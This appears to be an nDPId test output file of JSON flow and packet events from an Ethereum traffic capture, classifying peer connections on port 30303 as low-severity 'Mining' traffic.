00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1578508364786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364786,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GKKu\/6qLGwKgBuHZf3SxpEHBBX7euwaAS\/ohj6AAAAgQFoAQCCAo0GJnqItiUTwEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1578508364786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364786,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFbPAqAG4v+qixt0sdl9ft67BaRBwQoAQEAmAJwAAAQEICiLYlUg0GJnq"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1578508364786,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364787,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1578508364789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364789,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAADMGVclSkdz5wKgBuHZf3TlFnUTdn3ylU6AScSDFhwAAAgQFrAQCCAqGNr5sItiVBQEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1578508364789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364789,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGSNnAqAG4UpHc+d05dl+ffKVTRZ1E3oAQECxU+wAAAQEICiLYlUqGNr5s"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364714,"flow_last_seen":1578508364790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1578508364790,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"82.145.220.249","src_port":56633,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1578508364817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364817,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACgG15goQ5CAwKgBuHZf3TZG9x3QfGwlk6AScSARhwAAAgQFoAQCCApyLMYFItiU0QEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1578508364817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364817,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGv6DAqAG4KEOQgN02dl98bCWTRvcd0YAQEAmgwgAAAQEICiLYlWVyLMYF"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364659,"flow_last_seen":1578508364819,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364819,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1578508364823,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364823,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACYGE48SimxDwKgBuHZf3S4uwDPtE20MrKAS\/ogQ2gAAAgQFrAQCCAqmusMwItiUTwEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1578508364823,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364823,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+ZbAqAG4EopsQ90udl8TbQysLsAz7oAQECws4QAAAQEICiLYlWmmusMw"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364824,"flow_last_seen":1578508364824,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364824,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1578508364824,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364824,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGhG3AqAG4n8tUH906dl\/csM+rAAAAALAC\/\/\/IeAAAAgQFtAEDAwUBAQgKItiVagAAAAAEAgAA"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508364825,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1578508364831,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364831,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAOcGbbUSilEcwKgBuHZf3S\/8FjKFFTVZHKASaN8k0QAAAgQFrAQCCApjgYkbItiUTwEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1578508364831,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364831,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFL7AqAG4EopRHN0vdl8VNVkc\/BYyhoAQECyrKAAAAQEICiLYlW9jgYkb"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364832,"flow_last_seen":1578508364832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364832,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.228.29.160","src_port":56635,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1578508364832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364832,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGt9PAqAG4ouQdoN07dl+4t7BdAAAAALAC\/\/8\/HwAAAgQFtAEDAwUBAQgKItiVcAAAAAAEAgAA"}
00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":471,"flow_tot_l4_payload_len":471,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508364833,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1578508364841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364841,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADcGsuQiYawWwKgBuHZf3SnE3x7vnZqFEqAS\/ojiZQAAAgQFrAQCCAoxzJM4ItiUTwEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1578508364841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364841,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGqezAqAG4ImGsFt0pdl+dmoUSxN8e8IAQECz+XAAAAQEICiLYlXkxzJM4"}
00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364842,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364842,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1578508364862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364862,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGeCSlFmshwKgBuHZf3SJnRYz4cyqhtKAScSBl3gAAAgQFrAQCCAo1gVUZItiUTwEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1578508364862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364862,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGaCzAqAG4pRZrId0idl9zKqG0Z0WM+YAQECz0WAAAAQEICiLYlY01gVUZ"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508364863,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1578508364877,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364877,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACEGk4U0u88bwKgBuHZf3S3Pd7n11PppgaAS\/oiD+wAAAgQFoAQCCApvJb2EItiUTwEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1578508364877,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364877,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGdI3AqAG4NLvPG90tdl\/U+mmBz3e59oAQEAmf6AAAAQEICiLYlZpvJb2E"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":525,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1578508364879,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364922,"flow_last_seen":1578508364922,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364922,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.233.197.131","src_port":56637,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1578508364922,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364922,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGjuvAqAG4I+nFg909dl+ptEcpAAAAALAC\/\/+OGAAAAgQFtAEDAwUBAQgKItiVxAAAAAAEAgAA"}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364924,"flow_last_seen":1578508364924,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364924,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1578508364924,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364924,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtY\/AqAG40frwzd0+dl+QvttrAAAAALAC\/\/85bQAAAgQFtAEDAwUBAQgKItiVxgAAAAAEAgAA"}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364925,"flow_last_seen":1578508364925,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364925,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1578508364925,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364925,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHG4wAAEARgdzAqAG4I7T2qXZfdl0As6VnAUq3Z7jOf6Ug2frhkOredmKGawH96dNwPwCsVwwwAuHNRLachJG6Hj8pd5+\/iUKj3xzFalkHy\/4zo7e13\/nakEgcyoOcntMlISOmld4GtANNEoWSHW0IYrUbIiG7qvHSAQP4R7hAGwckxV38aoEQ3R3z6i1sbxgztMaJbhd8mlK6anhGQ6H0+w6JOUS\/FIH4b+eX+gcKRXXgkrfcf69BwK1A+Siq+4ReFiBg"}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364925,"flow_last_seen":1578508364925,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364925,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1578508364932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364932,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGkHGfy1QfwKgBuHZf3TprW2X93LDPrKAScSCdQwAAAgQFrAQCCApPeKo9ItiVagEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1578508364932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364932,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGhHnAqAG4n8tUH906dl\/csM+sa1tl\/oAQECwsmQAAAQEICiLYlc1PeKo9"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364932,"flow_last_seen":1578508364932,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364932,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1578508364932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364932,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGvd3AqAG4Etunn90\/dl9+5\/UeAAAAALAC\/\/851wAAAgQFtAEDAwUBAQgKItiVzQAAAAAEAgAA"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364824,"flow_last_seen":1578508364933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1578508364933,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1578508364932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364932,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGkHGfy1QfwKgBuHZf3TprW2X93LDPrKAScSCdQwAAAgQFrAQCCApPeKo9ItiVagEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1578508364932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364932,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGhHnAqAG4n8tUH906dl\/csM+sa1tl\/oAQECwsmQAAAQEICiLYlc1PeKo9"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364932,"flow_last_seen":1578508364932,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364932,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
